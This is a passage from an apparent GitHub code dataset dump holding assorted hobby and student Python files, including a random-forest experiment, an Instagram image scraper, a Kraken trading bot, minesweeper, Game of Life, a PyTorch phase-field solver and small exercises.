난쟁이.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19917711480","text":"# Import required libraries\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n# Generate a larger sample dataset for medical diagnosis\nnp.random.seed(42)\n\n# Generating features (X) with 100 instances and 5 features\nX = np.random.rand(100000, 5)\n\n# Generating labels (y) randomly as 0 or 1\ny = np.random.randint(2, size=100000)\n\n# Define the BLB sampling function\ndef blb_sampling(X_train, y_train, sample_size):\n num_instances = X_train.shape[0]\n indices = np.random.choice(num_instances, size=sample_size, replace=True)\n X_blb = X_train[indices]\n y_blb = y_train[indices]\n return X_blb, y_blb\n\n# Split the dataset into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Create an ensemble of BLB-RF models\nnum_models = 10\nsample_size = int(0.8 * X_train.shape[0])\n\nmodels = []\nfor i in range(num_models):\n # Perform BLB sampling on the training data\n X_train_blb, y_train_blb = blb_sampling(X_train, y_train, sample_size)\n\n # Train a Random Forest model on the BLB sample\n model = RandomForestClassifier(n_estimators=100)\n model.fit(X_train_blb, y_train_blb)\n\n # Add the trained model to the ensemble\n models.append(model)\n\n# Make predictions on the testing data using the ensemble\nensemble_predictions = []\nfor model in models:\n predictions = model.predict(X_test)\n ensemble_predictions.append(predictions)\n\n# Combine the predictions from the ensemble using voting or averaging\nfinal_predictions = ensemble_predictions[0]\nfor i in range(1, num_models):\n final_predictions += ensemble_predictions[i]\nfinal_predictions = final_predictions.astype(float)\nfinal_predictions /= num_models\n\n# Evaluate the accuracy of the ensemble predictions\naccuracy = accuracy_score(y_test, final_predictions.round().astype(int))\nprint(\"Accuracy of BLB-RF:\", accuracy)\n\n# Train a standard Random Forest model on the full training set\nstandard_model = RandomForestClassifier(n_estimators=100)\nstandard_model.fit(X_train, y_train)\n\n# Make predictions on the testing data using the standard RF model\nstandard_predictions = standard_model.predict(X_test)\n\n# Evaluate the accuracy of the standard RF model\nstandard_accuracy = accuracy_score(y_test, standard_predictions)\nprint(\"Accuracy of Standard RF:\", standard_accuracy)\n\n","repo_name":"eshe030/BLB","sub_path":"Code_in_python.py","file_name":"Code_in_python.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16547203438","text":"#인스타그램 사진 크롤링 연습만해보고 실제 어딘가에는 사용 XXXX 각 홈페이지마다 크롤링 허용 여부가 있습니다.\nfrom selenium import webdriver\nimport time\nimport urllib.request\nfrom urllib.parse import quote_plus\n\nid = '#{본인아이디}'\npw = '#{본인비밀번호}'\n\n\nurl = input('검색할 해시태그')\ndriver = webdriver.Chrome('./chromedriver') # 브라우저 열기\ndriver.implicitly_wait(3) # 브라우저 열동안 대기\ndriver.get('https://www.instagram.com/accounts/login/')\ndriver.implicitly_wait(2)\ndriver.find_element_by_name('username').send_keys(id) # id 값에 id 입력\ndriver.find_element_by_name('password').send_keys(pw) # pw 값에 pw 입력\ndriver.find_element_by_class_name('sqdOP.L3NKy').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/div/div/div/button').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('/html/body/div[4]/div/div/div/div[3]/button[2]').click()\ndriver.get('https://www.instagram.com/explore/tags/'+url+'/')\n# print(driver.find_element_by_class_name('g47SY').text)\nfrom selenium.webdriver.common.keys import Keys\nimport os\n\npath = '/home/pc31/Desktop/img/' # 이미지 저장할 경로 \nimg_folder = url\nif not os.path.isdir(path+img_folder):\n os.mkdir(path+img_folder)\ntry:\n cnt = 10\n body = driver.find_element_by_tag_name('body')\n div = driver.find_elements_by_class_name('KL4Bh')\n pagedowns = 1\n while pagedowns < cnt:\n body.send_keys(Keys.PAGE_DOWN) # 페이지 내리기 \n time.sleep(1)\n pagedowns += 1\n img = driver.find_elements_by_css_selector('.KL4Bh > img')\n imgUrl = set()\n for i in img:\n imgUrl.add(i.get_attribute('src'))\n print(i.get_attribute('src'))\n for index, link in enumerate(imgUrl):\n # name= i.split('/')\n # if '.jpg' in name[-1]:\n # print(name[-1])\n urllib.request.urlretrieve(link,path+img_folder+'/'+url+f'{index}.jpg')\nexcept Exception as e:\n print(str(e))\ndriver.close()\n","repo_name":"kyuwon53/nextIT-study","sub_path":"python/croll_photo.py","file_name":"croll_photo.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72954842473","text":"from krakenex.api import API\r\nimport logger\r\nimport bot\r\nimport AssetPairs as AP\r\n\r\nclass GMM_BOT(bot.Bot):\r\n\r\n\tdef __init__(self, path, pair):\r\n\t\tsuper(GMM_BOT, self).__init__(path, pair)\r\n\t\tself.mAPI\r\n\t\tself.mPair: dict[str, str] = pair\r\n\t\tself.mBase = pair['base']\r\n\t\tself.mQuote = pair['quote']\r\n\t\tself.mPairName = pair['pair'] \r\n\t\tself.mTickerPairName = self.mBase + self.mQuote\r\n\t\tself.mPairOrderMin = pair['order_min']\r\n\r\n\t\t# Can be changed during trading\r\n\t\tself.mTradeVolume = self.mPairOrderMin\r\n\t\tself.mPairFeePercent: float = 0.0026\r\n\t\tself.mSpread: float = float(bot.user.getUserInput(\"Spread? (Warning given if spread is not profitable) \"))\r\n\t\tself.mBuyMin: float = float(bot.user.getUserInput(\"Minimum buy? \"))\r\n\t\tself.mBuyMax: float = float(bot.user.getUserInput(\"Maximum buy? \"))\r\n\t\tself.mSellMin: float = float(bot.user.getUserInput(\"Minimum sell? \"))\r\n\t\tself.mSellMax: float = float(bot.user.getUserInput(\"Maximum sell? \"))\r\n\t\tself.mOrderGrid = self.createOrderGrid(self.mSpread, self.mBuyMin, self.mBuyMax, self.mSellMin, self.mSellMax )\r\n\r\n\t\t# Update after trade\r\n\t\tself.baseBalance = float(self.mAPI.get_asset_balance(pair['base']))\r\n\t\tself.quoteBalance = float(self.mAPI.get_asset_balance(pair['quote']))\r\n\r\n\tdef createOrderGrid(self, spread: float, buyMin: float, buyMax: float, sellMin: float, sellMax: float):\r\n\t\task = float(self.mAPI.get_ask_pair(self.mPairName, self.mTickerPairName))\r\n\t\t# The trade volume needs to be multiplied by the price to check if in range for profitablility\r\n\t\tprofit = (spread - ((float(self.mTradeVolume) * ask) * self.mPairFeePercent) )\r\n\t\tif (profit) <= 0:\r\n\t\t\tprint(\"Chosen spread will not be profitable on trades\")\r\n\t\t\tprint(\"profitablilty:\", profit)\r\n\t\tbuyRef = 1\r\n\t\tsellRef = 10000\r\n\r\n\t\tbuyPoint = buyMin\r\n\t\tbuys = []\r\n\t\twhile ( buyPoint < buyMax ):\r\n\t\t\tbuys.append({'volume': self.mPairOrderMin, 'price' : buyPoint, 'ref' : buyRef, 'buy_sell' : \"buy\"})\r\n\t\t\tbuyPoint += spread\r\n\t\t\tbuyRef += 1\r\n\r\n\t\tsellPoint = sellMin\r\n\t\tsells = []\r\n\t\twhile (sellPoint < sellMax):\r\n\t\t\tsells.append({'volume': self.mPairOrderMin, 'price' : sellPoint, 'ref' : sellRef, 'buy_sell' : \"sell\"})\r\n\t\t\tsellPoint += spread\r\n\t\t\tsellRef += 1\r\n\r\n\t\torderGrid = []\r\n\t\tfor s in sells:\r\n\t\t\torderGrid.append(s)\r\n\t\tfor b in buys:\r\n\t\t\torderGrid.append(b)\r\n\r\n\t\treturn orderGrid\r\n\r\n\r\n\tdef trade(self, base, quote, pairName, order_min):\r\n\t\ttickerPairName = base+quote\r\n\t\torders = self.queryAPI_allOrders()\r\n\r\n\t\t#### SCOUT/TRADE ####\r\n\t\t# start bot logger\r\n\t\tself.mGMMLogger = logger.setup_logger(self.mTickerPairName, self.mTickerPairName)\r\n\t\tself.mGMMLogger.info(\r\n\t\t\t'------------------------- New case --------------------------------')\r\n\t\t# Because of rounding errors balance may need to be rounded down 0.1 worth\r\n\t\tself.mGMMLogger.info(base + ' ' + str(self.baseBalance) + ' ' + quote + ' ' + str(self.quoteBalance))\r\n\r\n\t\t### TODO SEE IF CORRECT BUY IS BEING PULLED\r\n\t\tfor orderToPlace in self.mOrderGrid:\r\n\t\t\t# Check if order is on the books if it is get the order and txid if not order1 and txid are -1\r\n\t\t\torder1, txid1 = self.mAPI.get_order(orders, orderToPlace['price'], pairName)\r\n\t\t\tself.mGMMLogger.info('txid1 = ' + str (txid1))\r\n\t\t\tif float(orderToPlace['volume']) >= float(self.mPair['order_min']):\r\n\t\t\t\ttry:\r\n\t\t\t\t\t\t# submit following data and place or update order:\r\n\t\t\t\t\t\t# ( library instance, order info, pair, direction of order,\r\n\t\t\t\t\t\t# size of order, price, userref, txid of existing order,\r\n\t\t\t\t\t\t# price precision, leverage, logger instance, oflags )\r\n\t\t\t\t\t\t# \r\n\r\n\t\t\t\t\t\tres = self.mAPI.check4trade(order1, pairName, orderToPlace['buy_sell'], float(orderToPlace['volume']),\r\n\t\t\t\t\t\t \t\t\t\t\t\t\t\tfloat(orderToPlace['price']), int(orderToPlace['ref']), txid1, self.mGMMLogger, 'post')\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\tself.mGMMLogger.info('traded: ' + str(res))\r\n\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint('Error occured when ', orderToPlace['buy_sell'], pairName, e)\r\n\t\t\t\t\t\tself.mGMMLogger.warning('Error occured when ' + orderToPlace['buy_sell'] + pairName + str(e))\r\n\t\t\t\t# cancel existing order if new order size is less than minimum\r\n\t\t\telse:\r\n\t\t\t\tres = self.mAPI.check4cancel(order1, txid1)\r\n\t\t\t\tprint('Not enough funds to ', orderToPlace['buy_sell'], pairName, 'or trade vol too small; canceling', res)\r\n\t\t\t\tself.mGMMLogger.info('Not enough funds to ' +\r\n\t\t\t\t\t\t\t\t\t\tstr(orderToPlace['buy_sell']) + ' ' + pairName +\r\n\t\t\t\t\t\t\t\t\t\t' or trade vol too small; canceling ' + str(res))\r\n\t\t\tif res != -1:\r\n\t\t\t\t\tif 'error' in res and res.get('error') != []:\r\n\t\t\t\t\t\t\tself.mGMMLogger.warning(pairName + ' trading error ' + str(res))\r\n\t\r\n\t\tself.mGMMLogger.handlers.pop()\r\n\t\treturn\r\n\r\n\r\n","repo_name":"Bvaladez/bardedKraken","sub_path":"grid_market_maker_BOT.py","file_name":"grid_market_maker_BOT.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12076237737","text":"import sys\nimport random\nimport ctypes\nfrom tkinter import Label, Button, PhotoImage\nfrom utils import height_percentage, width_percentage\nfrom settings import GRID_SIZE, MINES_COUNT, CELL_COUNT\n\nwidth = int(width_percentage(70) / GRID_SIZE)\nheight = int(height_percentage(70) / GRID_SIZE)\n\n\nclass Cell:\n all = []\n cell_count = CELL_COUNT\n cell_count_label = None\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.is_mine = False\n self.is_open = False\n self.is_mine_candidate = False\n self.cell_btn = None\n\n Cell.all.append(self)\n\n @property\n def surrounding_cells(self):\n return [cell for cell in Cell.all if self._is_surrounding_cell(cell.x, cell.y)]\n\n @property\n def surrounding_mines(self):\n return [mine for mine in self.surrounding_cells if mine.is_mine]\n\n @property\n def surrounding_mines_count(self):\n return len(self.surrounding_mines)\n\n def create_btn(self, location):\n image = PhotoImage()\n btn = Button(\n location,\n bg='lightgray',\n image=image,\n width=width,\n height=height,\n compound='center'\n )\n\n btn.bind('', self._left_click_actions) # Left click\n btn.bind('', self._right_click_actions) # Right Click\n\n self.cell_btn = btn\n\n @staticmethod\n def create_cell_count_label(location):\n Cell.cell_count_label = Label(\n location,\n bg='black',\n fg='white',\n text=f'Cells Left: {Cell.cell_count}',\n font=('', 30)\n )\n\n def _left_click_actions(self, _):\n if not self.is_mine_candidate:\n if self.is_mine:\n self._show_mine()\n else:\n if self.surrounding_mines_count == 0:\n for cell in self.surrounding_cells:\n cell.show_cell()\n self.show_cell()\n if Cell.cell_count == MINES_COUNT:\n ctypes.windll.user32.MessageBoxW(0, 'You win the game!', 'Congratulations', 0)\n\n def _right_click_actions(self, _):\n if not self.is_open:\n image = PhotoImage()\n self.cell_btn.configure(image=image, bg='lightgray' if self.is_mine_candidate else 'orange')\n self.is_mine_candidate = not self.is_mine_candidate\n\n def _show_mine(self):\n \"\"\"Interrupts the game and displays a message that player lost!\"\"\"\n image = PhotoImage()\n self.cell_btn.configure(image=image, bg='red')\n\n ctypes.windll.user32.MessageBoxW(0, 'You clicked on a mine!', 'Game Over', 0)\n sys.exit()\n\n def show_cell(self):\n if not self.is_open:\n Cell.cell_count -= 1\n image = PhotoImage()\n self.cell_btn.configure(image=image, bg='white', text=f'{self.surrounding_mines_count}')\n # replace the text of the count with the new value\n if Cell.cell_count_label:\n Cell.cell_count_label.configure(text=f'Cells Left: {Cell.cell_count}')\n\n # Mark the cell as opened we could unbind the event after opening the cell\n self.is_open = True\n\n def _is_surrounding_cell(self, x, y):\n \"\"\"Check if the specified axis is surrounding the current cell\"\"\"\n if x == self.x and y == self.y:\n return False\n if x - 1 <= self.x <= x + 1 and y - 1 <= self.y <= y + 1:\n return True\n else:\n return False\n\n @staticmethod\n def randomize_mines():\n cells_to_mine = random.sample(Cell.all, MINES_COUNT)\n for cell in cells_to_mine:\n cell.is_mine = True\n\n def __repr__(self):\n return f'Cell({self.x}, {self.y}, {self.is_mine})'\n","repo_name":"pyscriptbug/minesweeper","sub_path":"cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"86451664923","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 16 07:40:09 2022\n\n@author: Roger Hegstrom (rhegstrom@avc.edu)\n\nNOTE: \n - I WOULD RUN THIS ON THE COMMAND LINE AND NOT IN SPYDER ex: python main.py\n \n \nConway's Game of Life\n---------------------\n RULES:\n If cell is DEAD and has 3 ALIVE neighbors --> becomes ALIVE\n \n If cell is ALIVE and has 2 or 3 ALIVE neighbors --> stays ALIVE\n otherwise --> cell DIES\n\n Display the 20x20 grid at each step, observe how the game progresses. \n \nReport on:\n 1. what was the fewest number of steps (from a random beginning) until all cells are 'dead,'\n 2. what was the smallest number of steps until a stable configuration was found. Put these answers in comments in the code. \n \n I ran the program 30+ times:\n The smallest number of steps to reach a stable configuration was 29\n The smallest number of steps for all cells to die was 49(ALL CELLS ONLY DIED TWICE)\n \n \n\"\"\"\nimport numpy as np\nimport os\nimport time\n\n\n#ROWS = os.get_terminal_size().lines - 1\n#COLUMNS = os.get_terminal_size().columns\n\nROWS = 20\nCOLUMNS = 20\n\nALIVE = 1\nDEAD = 0\n\n\ndef calculateAliveNeighbors(row,col):\n \"\"\"\n Returns the alive neighbors of (row, col) on the board\n\n Parameters\n ----------\n row : int\n row in the board array.\n col : int\n column in the board array.\n\n Returns\n -------\n alive_neighbors : int\n Number of alive neighbors.\n\n \"\"\" \n # Keep values in the proper ranges within the board matrix\n row_begin = (row-1) if (row-1) >= 0 else 0\n row_end = (row+2) if (row+2) < ROWS else ROWS\n \n col_begin = (col-1) if (col-1) >= 0 else 0\n col_end = (col+2) if (col+2) < COLUMNS else COLUMNS\n\n alive_neighbors = (np.sum(board[row_begin:row_end, col_begin:col_end])\n - board[row, col])\n \n return alive_neighbors\n\n\ndef printBoard():\n \"\"\"\n Prints the current board to screen\n\n Returns\n -------\n None.\n\n \"\"\"\n os.system('cls')\n for row in range(ROWS):\n for col in range(COLUMNS):\n print('#' if board[row, col] == ALIVE else ' ', end='')\n print('')\n \n\n\n\n# Populate initial board with random values and print board\nboard = np.random.choice([0, 1], p=[0.6, 0.4], size=(ROWS, COLUMNS)) \n\npreviousBoard = np.zeros((20,20))\n \nprintBoard()\ntime.sleep(1)\n\nsteps = 0\n# Main Program Loop\nwhile True:\n tempBoard = np.zeros((ROWS, COLUMNS), dtype=int) # next iteration board\n for row in range(ROWS):\n for col in range(COLUMNS):\n alive_neighbors = calculateAliveNeighbors(row, col)\n if ((board[row, col] == ALIVE and alive_neighbors in (2, 3)) \n or (board[row, col] == DEAD and alive_neighbors == 3)):\n tempBoard[row, col] = ALIVE\n else:\n tempBoard[row, col] = DEAD \n \n steps = steps + 1\n if ( (previousBoard == board).all() or (previousBoard == tempBoard).all()):\n print(f\"(steps={steps}) A stable state has been achieved...\")\n exit(0)\n \n previousBoard = board.copy()\n board = tempBoard.copy()\n printBoard()\n \n if (np.sum(board) == 0 ):\n print(f\"(steps={steps}) A stable state has been reached(all cells died)...\")\n# time.sleep(0.1)","repo_name":"rhegstrom/GameOfLife","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26230799760","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport numpy as np\n\n\nclass Net(nn.Module):\n def __init__(self, h2, dt, eps, device):\n super(Net, self).__init__()\n\n self.h2 = h2\n self.dt = dt\n self.eps = eps\n self.delta = torch.Tensor([[[0, 0, 0], [0, 1, 0], [0, 0, 0]], [[0, 1, 0], [1, -6, 1], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 0], [0, 0, 0]]]).to(device)\n self.delta = torch.unsqueeze(self.delta, 0)\n self.delta = torch.unsqueeze(self.delta, 0)\n self.pad = nn.ReplicationPad3d(1)\n self.alpha = self.dt / eps ** 2\n\n def forward(self, x):\n u_pad = self.pad(x)\n dff = F.conv3d(u_pad, self.delta)\n x = (1 + self.alpha) * x - self.alpha * x ** 3 + self.dt * dff / self.h2\n\n return x\n\ndef fdm_pytorch(nx, ny, nz, init_arr, h2, dt, eps, maxit, init, save, mode):\n\n if mode == 0:\n device = \"cuda:0\"\n print(\"GPU version\")\n else:\n device = \"cpu\"\n print(\"CPU version\")\n\n model = Net(h2, dt, eps, device).to(device)\n\n # Initial value\n img = torch.FloatTensor(init_arr[1:-1, 1:-1, 1:-1]).view(-1, 1, nx, ny, nz).to(device)\n\n start = time.time()\n pnusols = []\n number = 0\n\n with torch.no_grad():\n\n for step in range(maxit):\n u = model(img)\n img = u\n pnusols.append(img.view(nx, ny, nz).cpu().numpy())\n\n if (save == 1) and (mode == 0):\n if step % 50 == 0:\n with open('./data/3d_gpu/' + init +'_' + str(number) + '.npy', 'wb') as f:\n np.save(f, img.view(nx, ny, nz).cpu().numpy())\n f.close()\n number += 1\n\n runtime = time.time() - start\n print(\"Pytorch Runtime: \", runtime)\n\n return np.array(pnusols), runtime","repo_name":"kimy-de/gpuallencahn","sub_path":"3d/pytorch_code.py","file_name":"pytorch_code.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"13938863767","text":"from turtle import Turtle, Screen\nfrom random import randint\n\nscreen = Screen()\nscreen.setup(width=800, height=480)\nbet = screen.textinput(title='Make your bet', prompt=\"Who gonna win? \")\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"indigo\", \"violet\"]\ny_axis = [-150, -100, -50, 0, 50, 100, 150]\nturtles = []\n\nfor i in range(len(y_axis)):\n t1 = Turtle(\"turtle\")\n t1.color(colors[i])\n t1.penup()\n t1.goto(x=-380, y=y_axis[i])\n turtles.append(t1)\n\nif bet:\n race_on = True\n\nwhile race_on:\n for turtle in turtles:\n turtle.forward(randint(a=0, b=10))\n if turtle.xcor() > 380:\n race_on = False\n winning_color = turtle.pencolor()\n if winning_color == bet:\n print(f\"You've won! The {winning_color} turtle is the winner!\")\n else:\n print(f\"You've lost. The {winning_color} turtle is the winner.\")\n\nscreen.exitonclick()","repo_name":"yadaovinzce52/Python-Projects","sub_path":"Turtle Race/race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7368315406","text":"#Check if an input year is a leap year\n#Leap years are (1) divisible by 4, (2) not divisible by 100, (3) unless 2 is also divisible by 400\n\nyear = int(input(\"Enter year: \"))\nyear1 = year%4\nyear2 = year%100\nyear3 = year%400\n\ndef leapyear(year):\n year1 = year%4\n year2 = year%100\n year3 = year%400\n year = year + 1\n if year1 == 0 :\n print(\"This coul be a leap year, hold on\")\n if year2 != 0 : return True #print(\"This is definitely a leap year\")\n elif year2 == 0 & year3 == 0 : return True #print(\"Hm.. It's a leap year, yeah\")\n else : print(\"That might be a leap year, I dont know\")\n else : return False #print(\"That's not a leap year dog!\")\n\n# leapyear(year)\n\ndef daysinmonth(year, month):\n \"\"\"Returns int, number of months in given month and year\"\"\"\n #Docstring\n months = {\n \"January\" : 1,\n \"February\" : 2,\n \"March\" : 3,\n \"April\" : 4,\n \"May\" : 5,\n \"June\" : 6,\n \"July\" : 7,\n \"August\" : 8,\n \"September\" : 9,\n \"October\" : 10,\n \"November\" : 11,\n \"December\" : 12\n }\n days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n answer = days[months[month]-1]\n if leapyear(year) :\n answer += 1\n return answer\n\nmonth = input(\"Enter month: \")\ndays = daysinmonth(year, month)\nprint(days)","repo_name":"Pham3n/python100days","sub_path":"day10/100daysinmonth.py","file_name":"100daysinmonth.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18709565133","text":"from Bio.Seq import *\nimport re\ngenome_seq=\"\"\nwith open(\"/Users/yiranli/Downloads/genome.fasta\") as f1:\n\tfor line in f1:\n\t\tif not line.startswith(\">\"):\n\t\t\tgenome_seq=genome_seq+line.strip()\ngenome_seq_rc=reverse_complement(genome_seq)\n\nwith open(\"/Users/yiranli/Downloads/cpar_tRNA_cryptodb.fa\") as f2:\n\tfor line in f2:\n\t\t# if not line.startswith(\">\"):\n\t\t# \tprint(line.strip())\n\t\t# else:\n\t\t# \ti_seq=line.strip()\n\t\t# \tprint(reverse_complement(i_seq))\n\t\tif not line.startswith(\">\"):\n\t\t\ti_seq=line.strip()\n\t\t\ti_seq=reverse_complement(i_seq)\n\t\t\tfor j in range(0,len(i_seq)-16):\n\t\t\t\tfor i in range(j+16,len(i_seq)+1):\n\t\t\t\t\tcount=len(re.findall(i_seq[j:i],genome_seq))+len(re.findall(i_seq[0:i],genome_seq_rc))\n\t\t\t\t\tif count==1:\n\t\t\t\t\t\tprint('{}\\tY'.format(i_seq[j:i]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint('{}\\tN'.format(i_seq[j:i]))","repo_name":"YIRAN117/code_archives","sub_path":"mintmap_lookuptable.py","file_name":"mintmap_lookuptable.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72968034473","text":"from .cfr_base import CFRBase\n\n\nclass CFRLazy(CFRBase):\n def __init__(\n self,\n *args,\n **kwargs,\n ):\n kwargs.update(\n dict(\n # only allow alternating update cycles\n alternating=True,\n )\n )\n super().__init__(\n *args,\n **kwargs,\n )\n raise NotImplementedError(\"Lazy CFR is not yet implemented/\")\n","repo_name":"maichmueller/cfrainbow","sub_path":"src/cfrainbow/cfr/cfr_lazy.py","file_name":"cfr_lazy.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28860366219","text":"# SI5324 Configuartion Interpreter\r\n# By Elliott Koehn\r\n# 2019-10-03\r\n\r\n# Takes output SI5324 Register map from DSPLLsim and places it into verilog autoconfiguartion file.\r\n\r\n### Import packages\r\nfrom os import path\r\nimport sys\r\nimport datetime\r\npathname = path.dirname(sys.argv[0])\r\n\r\n#%% Custom defintion alternative to isDigit that includes hex characters\r\ndef ishex(char):\r\n if char.isdigit():\r\n return True\r\n elif (char >= 'A') and (char <= 'F'):\r\n return True\r\n else:\r\n return False\r\n\r\n#%% Format Line for Verilog\r\ndef format_line(line, count):\r\n reg = ''\r\n data = ''\r\n i = True\r\n for c in line:\r\n if not ishex(c):\r\n if reg == '':\r\n continue\r\n else:\r\n i = False\r\n else:\r\n if i == True:\r\n reg += c\r\n else:\r\n data += c\r\n vline = \"\\t\\t6'd\" + str(count) + \": begin SI_DATA = {8'hD0,8'd\" + reg + \",8'h\" + data + \"}; end\\n\"\r\n return vline\r\n\r\n#%% Open Configuration File\r\nwhile True:\r\n file = input('Enter the file name of the configuration, (default is ''SI5324 Config 1-1 at 200MHz''): ')\r\n if not file:\r\n file = \"SI5324 Config 1-1 at 200MHz\" # Default 1 to 1 at 200 MHz Clock Configuration\r\n elif file == \"q\":\r\n sys.exit(0)\r\n try:\r\n cfg_file = open(path.join(pathname, file + '.txt'), 'r')\r\n except:\r\n continue\r\n else:\r\n break\r\n\r\ncomment = \"\"\"//////////////////////////////////////////////////////////////////////////////////\r\n// SI5324 AutoConfig generated based on \r\n// \"\"\" + file + \"\"\" generated from SI DSPLLsim software\r\n//\r\n// By Elliott Koehn\r\n//\r\n// Autogenerated on \"\"\" + str(datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")) + \"\"\"\r\n//\r\n//////////////////////////////////////////////////////////////////////////////////\\n\r\nmodule \"\"\"\r\n\r\n#%% File Settings\r\nfile = file.replace(' ', '_').replace('-', '_')\r\noutput = file + \".v\"\r\npart1 = \"z1_SI5324_AutoConfig\"\r\npart2 = \"z2_SI5324_AutoConfig\"\r\n\r\n#%% Create output file and write part 1\r\nout = open(path.join(pathname, output), \"w+\")\r\np1 = open(path.join(pathname, part1), \"r\")\r\nif p1.mode == 'r':\r\n contents = p1.read()\r\np1.close()\r\nout.write(comment + file + contents)\r\n\r\n#%% Write in register map\r\ncount = 1\r\ndefault = ''\r\nwhile True:\r\n line = cfg_file.readline()\r\n if not line:\r\n break\r\n if line[0] == '#':\r\n continue\r\n if line[-1] != '\\n':\r\n line = line + '\\n'\r\n vline = format_line(line, count)\r\n if count == 0:\r\n default = \"\\t\\tdefault\" + vline[7:]\r\n out.write(vline)\r\n count += 1\r\ncfg_file.close()\r\nout.write(default)\r\n\r\n#%% Write part 2\r\np2 = open(path.join(pathname, part2), \"r\")\r\nif p2.mode == 'r':\r\n contents = p2.read()\r\np2.close()\r\nout.write(contents)\r\nout.close()\r\nsys.exit(0)","repo_name":"ekoehn/OTDR_KC705","sub_path":"si5324_config.py","file_name":"si5324_config.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17933777384","text":"\ndef calc(a,b):\n sum = a + b\n print(\"Sum: \", str(sum))\n difference = a - b\n print(\"Difference: \",str(difference))\n multiply = a * b\n print(\"Product: \", str(multiply))\n divide = 0\n if(b != 0):\n divide = a / b\n print(\"Quotient: \",str(divide))\n else:\n print(\"You can't divide by zero!!!\")\n results = [sum,difference,multiply,divide]\n addedList = 0\n for num in results:\n addedList += num\n print(\"Added list: \", str(addedList))\n\n\ncalc(4,3)\n\n\n\n","repo_name":"Jacob-Eckroth-School/362-InClassGit","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"858289541","text":"from __future__ import annotations\n\nimport argparse\nimport os.path\n\nimport pytest\n\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\n\ndef compute(s: str) -> int:\n rtn_val = 0\n lines = s.splitlines()\n letter = 0\n for line in range(0, len(lines), 3):\n e1 = lines[line]\n e2 = lines[line+1]\n e3 = lines[line+2]\n\n for i in e1:\n if i in e2 and i in e3:\n letter = i\n break\n if letter.islower():\n rtn_val += ord(letter) - 96\n else:\n rtn_val += ord(letter) - 38\n\n return rtn_val\n\n\nINPUT_S = \"\"\"\\\nvJrwpWtwJgWrhcsFMMfFFhFp\njqHRNqRjqzjGDLGLrsFMfFZSrLrFZsSL\nPmmdzqPrVvPwwTWBwg\nwMqvLMZHhHMvwLHjbvcjnnSBnvTQFn\nttgJtRGJQctTZtZT\nCrZsJsPPZsGzwwsLwLmpwMDw\n\"\"\"\nEXPECTED = 70\n\n\n@pytest.mark.parametrize(\n (\"input_s\", \"expected\"),\n ((INPUT_S, EXPECTED),),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"data_file\", nargs=\"?\", default=INPUT_TXT)\n args = parser.parse_args()\n\n with open(args.data_file) as f, support.timing():\n print(compute(f.read()))\n\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n","repo_name":"grove825/aoc2022","sub_path":"day03/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25808200936","text":"#!/usr/bin/env python\n\nnum1 = int(input(\"num 1\"))\nnum2 = int(input(\"num 2\"))\nnum3 = int(input(\"num 3\"))\n\nif(num1 > num2 and num1 > num3):\n print(\"Num1 maior que Num2 e Num3\")\nelif(num2 > num1 and num2 > num3):\n print(\"Num2 maior que Num1 e Num3\")\nelse:\n print(\"Num3 mairo que Num1 e 